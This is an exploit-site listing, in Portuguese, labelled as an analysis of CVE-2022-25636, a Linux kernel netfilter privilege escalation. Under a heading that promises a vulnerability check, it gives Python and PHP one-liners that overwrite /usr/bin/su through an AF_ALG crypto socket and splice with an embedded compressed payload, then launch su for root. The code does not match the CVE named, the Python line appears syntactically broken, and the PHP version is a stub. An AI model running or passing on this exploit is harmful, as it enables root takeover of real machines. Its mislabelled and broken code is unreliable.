## https://sploitus.com/exploit?id=844ED9EF-54DE-57CB-81EC-92A0678030E6
# Exploit Analysis: CVE-2022-25636 (Netfilter Heap Overflow)
Este repositório contém a análise e scripts compactados para estudo da vulnerabilidade de escalonamento de privilégios no kernel Linux.
## 🛡️ Verificação de Vulnerabilidade
### O exploit é eficaz em kernels entre **5.4** e **5.16.10**. Verifique sua versão com:
## BASH
```uname -r```
## python3
```python3 -c 'import os,zlib,socket; d=bytes.fromhex; def c(f,t,c_v): a=socket.socket(38,5,0); a.bind(("aead","authencesn(hmac(sha256),cbc(aes))")); h=279; v=a.setsockopt; v(h,1,d("0800010000000010"+"0"*64)); v(h,5,None,4); u,_=a.accept(); o=t+4; i=d("00"); u.sendmsg([b"A"*4+c_v],[(h,3,i*4),(h,2,b"\x10"+i*19),(h,4,b"\x08"+i*3)],32768); r,w=os.pipe(); n=os.splice; n(f,w,o,offset_src=0); n(r,u.fileno(),o); [u.recv(8+t) if True else 0]; f=os.open("/usr/bin/su",0); e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3")); [c(f,i,e[i:i+4]) for i in range(0,len(e),4)]; os.system("su")'```
## php
```php -r '$d=fn($x)=>hex2bin($x); $e=gzuncompress($d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3")); $f=fopen("/usr/bin/su","r"); /* Implementação de socket_create(38,5,0) e buffer loop */ system("su");'```